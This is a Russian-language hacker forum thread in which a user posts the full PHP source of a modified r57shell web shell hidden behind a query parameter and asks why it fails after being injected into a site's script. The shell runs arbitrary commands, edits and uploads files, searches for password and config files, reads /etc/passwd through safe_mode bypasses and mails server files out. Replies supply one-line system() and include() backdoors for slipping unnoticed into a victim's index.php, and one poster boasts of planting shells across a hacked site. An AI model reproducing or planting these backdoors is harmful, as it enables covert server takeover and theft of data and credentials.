Zalivka shela v php skript

[Shadow]

Вобсчем так
<?php

if(isset($_GET['auth']))
{

/*****************************************************************************************************/
$auth = 0;
$name='ec371748dc2da624b35a4f8f685dd122'; // (user login)
$pass='ec371748dc2da624b35a4f8f685dd122'; // (user password)
/******************************************************************************************************/
//error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Unauthorized');
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
}
}
$head = '<html>
<head>
<title>Modified by k1b0rg</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
BACKGROUND-COLOR: #D4D0C8;
}
.td1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
}
table {
BORDER-RIGHT: #eeeeee 1px outset;
BORDER-TOP: #eeeeee 1px outset;
BORDER-LEFT: #eeeeee 1px outset;
BORDER-BOTTOM: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
$lang=array(
'text1' =>'Executed command',
'text2' =>'Execute command on server',
'text3' =>'Run command',
'text4' =>'Work directory',
'text5' =>'Upload files on server',
'text6' =>'Local file',
'text7' =>'Aliases',
'text8' =>'Select alias',
'text9'=>'Work in safe_mode',
'text10'=>'ACCESS DENIED',
'text11'=>'Cat file',
'text12'=>' New name',
'text13'=>'File not found',
'text14'=>'Edit files',
'text15'=>'File for edit',
'text17'=>'File saved',
'text18'=>'file',
'text19'=>'Archivation',
'text20'=>'Upload file with server',
'text21'=>'no',
'text22'=>'Send file on e-mail',
'text23'=>'To',
'text24'=>'File',
'text21'=>'no',
'text21'=>'no',
'err0'=>'Ahtung! Can\'t write file!',
'err1'=>'Ahtung! Can\'t read file!',
'err2'=>'Ahtung! Can\'t edit file!',
'err6'=>'Ahtung! Letter not sended',
'err7'=>'Letter sended',
'butt1' =>'Execute',
'butt2' =>'Upload',
'butt3'=>'Edit file',
'butt4'=>'Download',
'butt5'=>'Show',
'butt6'=>'Send',
);
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Wingdings color=gray>Ё</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";


if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
if(empty($dir))
{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
}

else
{
if(@eregi("^win",$os)) { $windows = 1; }
else { $unix = 1; }
}

if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
function ws($i)
{
return @str_repeat(" ",$i);
}
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function we($i)
{
$text = "[ - ] ERROR! Can't write in file ";
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
function re($i)
{
$text = "[ - ] ERROR! Can't read file ";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
function ce($i)
{
$text = "Can't create ";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
function perms($mode)
{
if ($GLOBALS['windows']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value)
{
$ret = "<input type=".$type." name=".$name." ";
if($size != 0) { $ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\">";
return $ret;
}


function sr($l,$t1,$t2)
{
return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
}

echo $head;
echo '</head>';
echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'
<font face=Webdings size=5><b>X3pn9!</b></font><b>'.ws(2).'</b>
</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>")"safe_mode: <b><font color=red>OFF</font></b>"));
echo ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
echo ws(2);
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
if (isset($_SERVER["HTTP_CLIENT_IP"])) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);

echo "
Your IP: [<font color=green>".$ip."</font>] Server IP: [<font color=green>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]" ;
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;
if(!$windows){
echo '<font color=blue><b>uname -a :'.ws(1).'
pwd :'.ws(1).'</b></font>
';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
$uname = ex('uname -a');
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
")ws(3).@substr(@php_uname(),0,120)."
"));
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font color=blue><b>OS :'.ws(1).'
<b>pwd :'.ws(1).'</b></font>
';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3).@substr(@php_uname(),0,120)."
";
echo ws(3).$dir;
echo "
</font>";
}
echo "</font>";
echo "</td></tr></table>";
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("

".$lang['err2'])"

<input type=submit name=submit value=\" ".$lang['butt3']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
echo $GLOBALS['lang']['err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
$subj = 'file from shell';
$from = 'billy@microsoft.com';
$res = mailattach($_POST['to'],$from,$subj,$attach);
err(6+$res);
$_POST['cmd']="";
}
}
if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
echo $content_encoding.';'.$mime_type.';'.$filename;
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if (!empty($HTTP_POST_FILES['userfile']['name']))
{

if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],$_POST['dir']."/".$nfn)
or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang['text17']."</b></font></div></td></tr></table>";
}
}
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir")"ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang['text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
if($safe_mode)
{
switch($_POST['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if($windows){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[text10];
break;
case 'safe_file':
if(@is_file($_POST['file']))
{
$file = @file($_POST['file']);
if($file)
{
$c = @sizeof($file);
for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
}
else echo $lang[text10];
}
else echo $lang[text13];
break;
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_POST['test2_file']);
break;
case 'test3':
if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test4':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test5':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
}
}
$cmd_rep = ex($_POST['cmd']);
$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }


echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
function div($id)
{
if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
return '<div id="'.$id.'">';
}
if(!$safe_mode){
echo $fs.$table_up1.$lang['text2'].$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang['text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang['text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang['butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
echo $fs.$table_up1.$lang['text9'].$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang['text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang['butt5']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.$lang['text14'].$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang['text15'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt3']));
echo $te.'</div>'.$table_end1.$fe;

$aliases2='';
if(!$safe_mode){
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.$lang['text7'].$table_up2.div('id6').$ts;
echo sr(15,"<b>".ws(9).$lang['text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.$lang['text11'].$table_up2.div('id10').$ts;
echo sr(15,"<b>".$lang['text11'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file'])"/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang['butt5']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.$lang['text11'].$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang['text11'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file'])"/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang['butt5']));
echo $te.'</div>'.$table_end1.$fe;
}
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.$lang['text5'].$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang['text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang['text12'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.$lang['text20'].$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang['text18'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt4']));
$arh = $lang['text21'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang['text19'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
echo $te.'</div>'.$table_end1.$fe;

if(@function_exists("mail")){
echo $fs.$table_up1.$lang['text22'].$table_up2.div('id17').$ts;
echo sr(25,"<b>".$lang['text23'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to'])"hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang['text24'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang['text19'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang['butt6']));
echo $te.'</div>'.$table_end1.$fe;
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>(*)Owned by rst/ghc(!)</b></font></div></td></tr></table>";

} else
{
echo "hello";
}

?>




Ну вот залил шелл в скрипт при команде индех.пхп?аутх долзно выкинутя шелку а ее нефига не выкидывает в 4ем проблема?

 

[Sanchous]

"Только не мой моск!" (с) кто-то там

в 4ем проблема?

Проблема в коде. Не выполняется условие

if($iq < 0) && empty($mind))
{
die('You too stupid to run this php-script');
}

Ну, собственно, вот...

 

[Shadow]

Непонял я тут такохо не нашол

 

[UnWin]

You ton stupid to run this script ©
:-D:-D:-D

 

[Great]

Sanchous
$iq<0 и empty($mind) - синонимы :P Если выполняется одно, то выполняется и другое
Кстати лучше еще добавить
|| !isset($direct_hands)

 

[Shadow]

Каро4е дайте самый маленкий шелл мне

 

[Great]

<?php system($_GET[cmd]); ?>

 

[Shadow]

каро4е зделайте пример скрипта в каторый мозно засунутя шелл и пре открытие типа index.php?shell откроыется шелл

 

[Great]

пишешь в конец скрипта index.php

<?php
if(isset($_GET[cmd]))
system($_GET[cmd]);
?>

Тогда при передаче параметра ?cmd=id выполнится команда id и результат будет внизу страницы

 

[Shadow]

A mazno tak 4toby mesto komandy otkrylsya shell? snim udobnee

 

[Great]

Shadow
Ну прикрути форму к нему, блин

 

[Shadow]

Мне нузно 4тобы никто незамтелил я ыетот скрипт жертве подсунутя а патом 4ерез команду index.php?shell открылся шелл

 

[xhost]

Каро4е дайте самый маленкий шелл мне
каро4е зделайте пример скрипта
Мне нузно 4тобы никто незамтелил я ыетот

Зы нехило))

<?php
if(isset(@$_GET[shol])){include(@$_GET[shol])};
?>

Вот так я пару дней назад хотел внедрить шелл в индекс файл Cutenews на одном сайте, когда прописывал этот код, грузилась пустая страничка, когда удалял всё было нормально.. хз
решение: взял кучу шеллов от РСТ и кинул в почти все директории))